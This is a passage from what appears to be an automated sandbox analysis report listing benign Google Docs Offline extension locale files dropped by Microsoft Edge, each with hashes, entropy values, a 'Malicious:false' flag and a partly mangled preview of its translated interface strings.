                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                  Encrypted:false
